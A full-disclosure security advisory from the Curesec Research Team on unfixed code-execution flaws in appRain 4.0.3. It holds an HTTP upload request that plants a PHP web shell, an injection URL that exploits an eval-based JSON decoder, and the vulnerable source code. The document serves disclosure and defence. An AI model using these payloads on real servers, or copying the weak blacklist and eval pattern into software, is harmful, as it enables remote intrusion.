appRain 4.0.3 Code Execution

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: appRain 4.0.3  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: [email protected]  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 10/02/2015  
Disclosed to public: 12/02/2015  
Release mode: Full Disclosure  
CVE: requested, but not assigned  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
appRain is described as a Content Management Framework written in PHP.  
  
There are various components of appRain 4.0.3 that should not provide the  
possibility of code execution or arbitrary file upload but do allow it.  
  
All of these issues are by default present in the admin area. It should be  
noted that admins already have code execution via a designated PHP file editor.  
  
Still, the code of appRain is explicitly intended to be extended by its users,  
which means that components such as a seemingly secure file uploader, an image  
uploader, or a function decoding json should not lead to code execution.  
  
3. Unrestricted Upload of File with Dangerous Type 1  
  
CVSS  
  
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C  
  
Description  
  
The file upload uses a blacklist for the file extension to forbid the upload of  
files with dangerous type. The disallowed extensions are:  
php,php3,php4,exe,pl,py,bat,sys,dev,sh  
  
However, files that can be uploaded and that also lead to code execution are  
.htaccess, as well as files with extension pht, php5, and phtml.  
  
The file upload can be found here:  
http://localhost/apprain/admin/filemanager  
  
An admin account is required to use the file manager. It should be noted that  
an admin already has code execution via the designated PHP file editor. Still,  
this is an access violation in the context of this component and will also be  
an issue if users reuse the varifyFileName function in different contexts,  
which is to be expected.  
  
Code  
  
  
/development/controllers/admin.php  
if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){  
App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']}) is restricted to uploaded.","Error");  
App::Config()->redirect("/admin/filemanager/upload");  
}  
else {  
$path = App::Config()->filemanagerDir(DS);  
$data = App::Utility()->upload($this->data['filemanager']['image'],$path);  
App::Module('Notification')->Push("File({$data['file_name']}) uploaded successfully.");  
App::Config()->redirect("/admin/filemanager");  
}  
  
/apprain/base/modules/filemanager.php  
public function varifyFileName($filename){  
$restrictedExt = explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT'));  
return !in_array(App::Utility()->getExt($filename),$restrictedExt);  
}  
  
/development/definition/system_configuration/config.xml:  
<value><![CDATA[php,php3,php4,exe,pl,py,bat,sys,dev,sh]]></value>  
  
4. Unrestricted Upload of File with Dangerous Type 2  
  
CVSS  
  
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C  
  
Description  
  
When creating a new slide, the label suggests that only images with extensions  
"*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded,  
including .php or .pht files.  
  
An admin account is required to create new slides. It should be noted that an  
admin already has code execution via the designated PHP file editor. Still,  
this is an access violation in the context of this component and may also be an  
issue if users reuse the involved functions in different contexts.  
  
Proof of Concept  
  
  
POST /apprain/information/manage/appslide/add HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------418924992299141519661615194  
Content-Length: 1178  
  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Option][title]"  
  
test  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht"  
Content-Type: application/octet-stream  
  
<?php  
passthru($_GET['x']);  
  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Option][description]"  
  
<p>test</p>  
  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Option][status]"  
  
Active  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="Button[button_save]"  
  
Save  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Information][id]"  
  
  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Information][type]"  
  
appslide  
-----------------------------418924992299141519661615194  
Content-Disposition: form-data; name="data[Information][page]"  
  
  
-----------------------------418924992299141519661615194--  
  
5. Possibly Code Execution  
  
CVSS  
  
High 7.6AV:N/AC:H/Au:N/C:C/I:C/A:C  
  
Description  
  
appRain is described as "Content Management Framework", and as such, it is to  
be expected that public functions are reused in different contexts and should  
thus be secure.  
  
If the function to decode json is used as described in the documentation, it  
will be unsecure if user input is passed to it, which is a likely scenario.  
This is also how it seems to be used by deletegroupAction, which is currently  
not used anywhere. If a user actually uses either of these functions, the code  
would likely be vulnerable.  
  
Proof of Concept  
  
  
Use the function, for example by adding the following to app.php:  
$data = App::Module('Cryptography')  
->jsonDecode('{"status":"Success","message":"' . $_GET['x'] . ' Updated successfully"}');  
pre($data);  
  
Now an attacker can gain code execution:  
http://localhost/apprain/?x=");passthru("touch 'test.php'");$y=array("x"=>"  
  
Code  
  
  
/apprain/base/modules/cryptography.php  
public function jsonDecode($json)  
{  
// Author: walidator.info 2009  
$comment = false;  
$out = '$x=';  
  
for ($i = 0; $i < strlen($json); $i++) {  
if (!$comment) {  
if ($json[$i] == '{') {  
$out .= ' array(';  
}  
else if ($json[$i] == '}') {  
$out .= ')';  
}  
else if ($json[$i] == ':') {  
$out .= '=>';  
}  
else {  
$out .= $json[$i];  
}  
}  
else {  
$out .= $json[$i];  
}  
if ($json[$i] == '"') {  
$comment = !$comment;  
}  
}  
  
eval($out . ';');  
  
return $x;  
}  
  
6. Solution  
  
This issue was not fixed by the vendor.  
  
7. Report Timeline  
  
10/02 Informed Vendor. Mailbox [email protected] is full, used  
/2015 [email protected] instead (no reply)  
10/21 Reminded Vendor of Disclosure Date  
/2015  
10/21 Vendor anounces fix for 11/02/2015  
/2015  
11/04 No fix released, extended public disclosure date to 11/11/2015  
/2015  
11/17 CVE Requested (no reply)  
/2015  
11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered  
/2015 extension if needed (no reply)  
12/02 Disclosed to public  
/2015  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/appRain-403-Code-Execution-111.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`